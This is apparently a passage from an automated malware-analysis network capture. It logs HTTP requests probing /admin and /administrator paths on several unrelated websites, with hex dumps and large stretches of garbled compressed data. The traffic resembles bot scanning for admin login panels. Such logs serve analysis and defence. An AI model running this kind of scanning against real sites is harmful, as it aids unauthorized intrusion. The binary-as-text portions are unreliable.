                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTI
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.503829002 CET1340INData Raw: e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d
                                                                                                                                                                                                                                                                                                                Data Ascii: OO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.503842115 CET1340INData Raw: 0c cd 97 c1 b7 33 22 e7 47 47 7b 3b 7b f7 c6 e9 2c 9f e6 8b 49 5e a7 7b e3 b4 f9 41 b5 98 64 ad 99 77 7a 2b 7c ef 8a e6 61 0e 98 83 2d e0 d7 34 1f 1d 91 d7 b2 ca 96 47 5f 64 8f d2 c7 f9 e2 e8 8b 9c 74 d0 2c 7b 7c 97 7e 1f f1 27 3f 59 10 1f 2e f9
                                                                                                                                                                                                                                                                                                                Data Ascii: 3"GG{;{,I^{Adwz+|a-4G_dt,{|~'?Y."0yUV&c/,}$&7T89UV6MSL<J64DB~l/iJ`G&o,V~7U_4c!F<{\,WV_$>RP nF~*
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.503854036 CET1340INData Raw: 2d 44 6c bf cd 7f 50 bc ad 96 d7 e4 97 45 7c 20 b8 21 f4 73 55 a4 c7 fa 42 8a 49 a5 8f e8 2d fa 85 66 97 5e 8d 60 7b 7b 74 58 42 89 61 34 a8 89 61 21 4d f4 8f 22 45 bb 48 97 f4 ab 18 10 fc 66 3e 24 3c 2c d1 54 23 ab 32 76 88 fd 10 0d c8 b7 0b 5e
                                                                                                                                                                                                                                                                                                                Data Ascii: -DlPE| !sUBI-f^`{{tXBa4a!M"EHf>$<,T#2v^3zOX^">sYFT)?(J-B;0 r#." GDrW8`XEd}F1(B)|A=*YvM4$ boNHON5eF@~'s&
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.706720114 CET1340INData Raw: 95 e0 c7 bf eb f6 76 7a 77 4c 8b b4 58 ab 35 ab ba e9 f6 36 b7 0a da d0 0a b3 bf 7c 2f 6d 1e df a5 57 e9 a7 fc 47 5d 51 17 78 87 7f 77 bf ba df e8 ff e6 0f fc 4a bf 19 26 2e b3 eb 6a dd 6e 2f a8 0f 61 61 ff 4b db b9 7c 15 7c 57 57 57 fa 29 41 27
                                                                                                                                                                                                                                                                                                                Data Ascii: vzwLX56|/mWG]QxwJ&.jn/aaK||WWW)A'U^C_Q0*fQzoggo<K^}.v^6X-o/U-Tos^^Z|y=/;//o
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.706731081 CET1149INData Raw: be fb b1 5f 38 ad 56 d7 87 60 b9 03 62 c7 bd 7b 63 21 8a cd 9e 9b ac 50 fa ed 6a 49 a1 cf 4f 67 e9 17 05 69 d9 65 fa d3 d5 45 7a 9e 2f 09 9f 9a 92 16 bf ab 80 33 03 a3 5f a3 dd 12 89 c9 0d ab 8b 8b 39 f9 3d d2 cc e3 e2 62 b1 aa f3 a6 f9 c1 9a fc
                                                                                                                                                                                                                                                                                                                Data Ascii: _8V`b{c!PjIOgieEz/3_9=b3;/^"55Ynw?:Y}K 2pElhtm>jsHjB>0zkw>O;Wc)>!1lXS6kG|N
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.777620077 CET491OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: __RequestVerificationToken=L4fpWIQFNsub_ozR1dLpTZAJEWIJbg0-lgoDkDO8Qi8CWGprPFppiqDMoPZXNqF4WckQK4Xpzk7D75Wvq450-nfzCBGxRAFFOm9JKEQ5MEM1; ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44x
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://bokod.hu/Home/Login?ReturnUrl=%2fadministrator%2f
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.992525101 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57 bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7 fd 27 fb 3b bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzWE?z/w]\~=?yz=*oE~_|q^\||?N~g';
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.992533922 CET1340INData Raw: ce 57 ed a7 a7 c7 2f 5e 9e dd bb f8 7a 7d 4e ca 75 5e 2c 56 db 17 59 59 e6 f5 b5 76 fb dd f6 f3 ec bb a7 c7 cf bf 7a bb ff dd e6 cb b3 f5 6c f9 e5 f9 83 f5 d3 df e7 27 7e 70 f0 f2 c5 ef 73 fd 7b 3d b9 b7 77 fa 7b 1d 3f f9 c9 e7 4f bf 66 b7 e7 c4
                                                                                                                                                                                                                                                                                                                Data Ascii: W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{':;{}3Eg^o-?o^tqsz|3O:'O
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.992541075 CET1340INData Raw: af 0b 12 1d 17 d8 55 cb b7 44 bf 6c 79 fd 83 ac bd bb 5e 16 55 b3 4d e6 f5 a7 f3 b7 6d fe 36 18 42 0c d2 76 9b d7 97 b7 02 b5 4d 9d ee e2 9f 07 01 50 7f 20 de ef fe af f4 9b e9 57 29 be cc 2e cd f8 fc 6f 23 b3 45 2d cd b7 f4 eb 24 e3 af d2 34 fa
                                                                                                                                                                                                                                                                                                                Data Ascii: UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@Lm{Rd<+Ef146Gg5'h!)?krffV"NH$FG
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.992548943 CET1340INData Raw: af 34 4c 65 95 98 2c 01 c5 6f 64 00 60 c0 4b 0a bf 28 cd 0d 69 a3 3f a4 53 fe e4 67 b3 e3 e6 07 d9 84 d6 19 88 0c c4 26 f4 cd 25 e4 f1 35 7d 48 fd 13 81 f4 9b 11 2b eb 0f 94 45 4a 78 95 97 19 a5 8b 6a 62 3c 88 c1 0b 7c 20 fd f0 a7 f2 2b 7d f5 41
                                                                                                                                                                                                                                                                                                                Data Ascii: 4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[=yS"D%DfwWI/K)g;]5si9JlI]TV
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.992557049 CET1340INData Raw: d1 f1 a0 ab 2e e1 df 2c 47 74 79 83 a8 47 6a fb 1f fd ab 7f f0 8f fe d5 44 3a fa 44 bf 7b 3f d6 d0 90 e1 1f fd fb 4a 02 43 31 3c 2d 0d d0 2f 5f 03 9f e7 f9 c5 f2 1f fd ab 57 b0 63 ff f8 df 3c 99 a4 d3 e2 ed 5b 0c 8c be 92 46 37 61 06 bc f8 17 4f
                                                                                                                                                                                                                                                                                                                Data Ascii: .,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_0m@;q4ww%uhn|'r{_M2+o(B{+{mjbl
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.992569923 CET343INData Raw: 74 f7 dd 9f ce 68 7d 8a 3f 15 25 f3 bb 6d cd aa 29 67 17 ef 8c eb 3c 9b 5d 6f 9d af 97 53 08 74 ba 75 27 fd c5 68 42 6d 3e 1a 33 5a 1f dd 91 9f 5b f2 f9 8f 65 6b 52 a5 24 92 8f 52 a4 c0 46 e1 87 af 57 79 3e 7b 94 7e ba b3 b3 63 be 99 65 a4 2a 2e
                                                                                                                                                                                                                                                                                                                Data Ascii: th}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[gFQfd_}8OcfQ]'qQUF}SF^%oNi@FF|D_"(S-


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                93192.168.2.653881195.68.234.25280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.011567116 CET221OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.221321106 CET485INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Location: http://www.pfprojekt.sk/admin
                                                                                                                                                                                                                                                                                                                Content-Length: 237
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.pfprojekt.sk/admin">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                94192.168.2.653871188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.011698008 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.228815079 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.228826046 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.287334919 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://eremina.net/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.502027035 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 